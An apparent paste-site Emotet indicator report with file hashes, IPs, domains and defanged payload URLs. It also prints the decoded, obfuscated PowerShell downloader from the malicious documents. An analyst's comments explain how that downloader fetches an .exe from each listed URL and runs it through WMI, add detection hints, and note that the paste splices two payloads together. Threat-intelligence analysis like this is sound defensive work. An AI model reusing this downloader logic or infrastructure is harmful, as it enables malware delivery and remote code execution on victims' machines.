paladin316

Emotet_Doc_out_2020-02-10_14_46.txt

Feb 10th, 2020
  1. #Emotet #Docs #malware #OSINT #IOC
  2.  
  3. SHA256:
  4. 37df1c897498e12038bca3c4ae4d02776ab77d84a6e33bac3593b15667f858b4
  5. b1d7b40258d9992759f67e3bd54fbb74a2f49734944fd6552c8fb10dcd967adb
  6. 6fc4a92196feef5bda8bdb05e2b5b05eb2c48450f60012863701e05f4aa73d03
  7. 5784596ff2c505653b8224d4e05914e5ec6d6844b3504268fdf152e6599e8331
  8. 48623cdba9af101991ee00bc2ff9ca3a5f83e5c70df0c7a7de313f41588f6349
  9. 58e6e19cb9159d73ba06ee2f9c774a5cf85a7f121452209a1d81f01ccc0deff4
  10. bf467bc7b27db7f31f5130fa89c4b97d9ab7c4e87e4d8e1c2b9398e0f8337983
  11. c72f6dd3870ea0daab032035a6a75457049d61271108aed09b813e0a61951f63
  12. 00f8f8d56720bada858c0e24c0c8c5c3bb3c360a941557055763513ddc728c9a
  13. 06b64e2e53c08beba1406ecb836952a5dd862fd465f5c7ff102f4f950d5430f8
  14. 97871c5963b97b79ce2d971be6184c2061ee2581980e067e3dee631dff7f7470
  15. fdb9005001ddb9dcaffdb590dd9fab7761288adcc49b6d78d9cf3d444281e7da
  16.  
  17.  
  18. IPs:
  19. 104.20.106.5
  20. 104.20.107.5
  21. 123.31.31.47
  22. 162.213.248.207
  23. 185.165.116.18
  24. 185.72.146.155
  25. 188.253.2.205
  26. 205.144.171.80
  27. 3.86.33.96
  28. 51.255.215.166
  29. 54.208.104.124
  30.  
  31. Domains:
  32. blog.prodigallovers.com
  33. gatelen-002-site1.htempurl.com
  34. khoshrougallery.com
  35. kobo.nhanhwebvn.com
  36. legal.dailynotebook.org
  37. ourproductreview.in
  38. ta-behesht.ir
  39. tatcogroup.ir
  40. tcpartner.ru
  41. tepcian.utcc.ac.th
  42.  
  43. Payload URLs (defanged):
  44. hxxp://ta-behesht.ir/images/Provx00a/
  45. hxxp://tatcogroup.ir/wp-admin/UC/
  46. hxxp://tcpartner.ru/wp-includes/nr8/
  47. hxxp://tepcian.utcc.ac.th/wp-admin/SquR/
  48. hxxp://ourproductreview.in/pokjbg746ihrtr/a1kzwc/
  49. hxxp://kobo.nhanhwebvn.com/wp-admin/Cy4bJWG2PW/
  50. hxxp://khoshrougallery.com/cgi-bin/fINL/
  51. hxxp://legal.dailynotebook.org/wp-includes/K3601365/
  52. hxxp://gatelen-002-site1.htempurl.com/6jfdf/yLv61/
  53. hxxp://blog.prodigallovers.com/wp-content/SO10/
  54.  
  55.  
  56. Decoded Base64 PowerShell (URLs defanged as hxxp):
  # Decoded second-stage downloader recovered from the maldoc (see the hashes above).
  # As pasted, this is two separate decoded payloads run together: the first ends at
  # `$Mlrztzvecwjg='Ciswcvxyzeqq'` on paste line 74 and the second starts immediately
  # after it on the same line, so the text below would not parse as a single script.
  # Both payloads do the same thing with different drop names, URL lists and size gates.
  # The many single-use string assignments ($Evizklrl, $Pjigzgyiukxvz, ...) are never
  # referenced again in the visible text; they only pad the script.
  57. $Evizklrl='Zpxlmpjesfu';
  58. $Nazcyjtbtbhwj = '879';
  59. $Pjigzgyiukxvz='Lvpbpzuwqhly';
  # Drop path: %USERPROFILE%\879.exe (numeric file name directly in the profile root).
  # Detection: a PowerShell process writing a .exe into the profile root, not a subfolder.
  60. $Djaaouswnbrhy=$env:userprofile+'\'+$Nazcyjtbtbhwj+'.exe';
  61. $Wihijkbdllr='Vmnqqkmhkfvx';
  # `&('new'+'-ob'+'ject') nEt.WebcLIENT` is New-Object Net.WebClient; the cmdlet and
  # method names are concatenated or split with backticks so the literal strings do not
  # appear in the script text. Script-block logging records the reassembled form.
  62. $Kqvfoxypez=&('new'+'-ob'+'ject') nEt.WebcLIENT;
  # Five download URLs in one string, split on [char]42 ('*'). The paste shows line breaks
  # where the separators would be; presumably the '*' was replaced when the list was
  # rendered here — confirm against the original decode before reusing the indicators.
  63. $Algyovsmnirll='hxxp://ta-behesht.ir/images/Provx00a/
  64. hxxp://tatcogroup.ir/wp-admin/UC/
  65. hxxp://tcpartner.ru/wp-includes/nr8/
  66. hxxp://tepcian.utcc.ac.th/wp-admin/SquR/
  67. hxxp://ourproductreview.in/pokjbg746ihrtr/a1kzwc/'."sP`lIT"([char]42);
  68. $Mrynihqxcqnp='Hkdkzhzkcrv';
  # Try each URL in order; any download error is swallowed by the empty catch and the
  # loop moves on, so a single dead host does not stop the chain.
  69. foreach($Xhipsvwp in $Algyovsmnirll){try{$Kqvfoxypez."dOwnL`O`ADFIle"($Xhipsvwp, $Djaaouswnbrhy);
  70. $Jmclkjqp='Xiiaxkwcaw';
  # Size gate: only a file of at least 37432 bytes is executed (presumably to skip error
  # pages or truncated downloads). Execution goes through WMI Win32_Process.Create rather
  # than Start-Process, so the dropped binary is not a direct child of powershell.exe;
  # correlate on the WMI provider host instead when hunting for this.
  71. If ((.('Get'+'-I'+'tem') $Djaaouswnbrhy)."Le`NgTh" -ge 37432) {([wmiclass]'win32_Process')."CRE`ATe"($Djaaouswnbrhy);
  72. $Ckxsucohstchl='Cgxavxfbr';
  # Stop after the first successful launch.
  73. break;
  # End of payload 1 / start of payload 2 on the same line (no separator in the paste).
  74. $Zgovrhjm='Mqvnxffo'}}catch{}}$Mlrztzvecwjg='Ciswcvxyzeqq'$Yyevdkfpmaiyt='Rsszsmutgtx';
  75. $Kezdhvwbpxqcj = '228';
  76. $Nvpwfxcoj='Fpndzwcmzf';
  # Payload 2 drop path: %USERPROFILE%\228.exe.
  77. $Ddxyzcwasf=$env:userprofile+'\'+$Kezdhvwbpxqcj+'.exe';
  78. $Jlkeexbgfj='Ftcorndigmmxg';
  # Same New-Object Net.WebClient, with a different split of the cmdlet name.
  79. $Botrnfhnigg=.('new-o'+'b'+'je'+'ct') nET.weBCLIENt;
  # Payload 2 URL list (the remaining five URLs from the list above), same '*' separator.
  80. $Wtkwsqtpxgyv='hxxp://kobo.nhanhwebvn.com/wp-admin/Cy4bJWG2PW/
  81. hxxp://khoshrougallery.com/cgi-bin/fINL/
  82. hxxp://legal.dailynotebook.org/wp-includes/K3601365/
  83. hxxp://gatelen-002-site1.htempurl.com/6jfdf/yLv61/
  84. hxxp://blog.prodigallovers.com/wp-content/SO10/'."s`plit"([char]42);
  85. $Xutwapkfk='Xqhfhwgnxguo';
  # Same download loop as payload 1, with its own size gate (21090 bytes) below.
  86. foreach($Kxgxcruxoot in $Wtkwsqtpxgyv){try{$Botrnfhnigg."dO`w`NLoad`FIlE"($Kxgxcruxoot, $Ddxyzcwasf);
  87. $Codwynxope='Mhkunrtyqn';
  88. If ((&('Ge'+'t'+'-Item') $Ddxyzcwasf)."l`EnGth" -ge 21090) {([wmiclass]'win32_Process')."c`Re`ATE"($Ddxyzcwasf);
  89. $Qqssbcgyk='Hilhviac';
  90. break;
  91. $Jzdcsduwwonbs='Evocfncijnefm'}}catch{}}$Myhjgropi='Bnjnfqdkqm'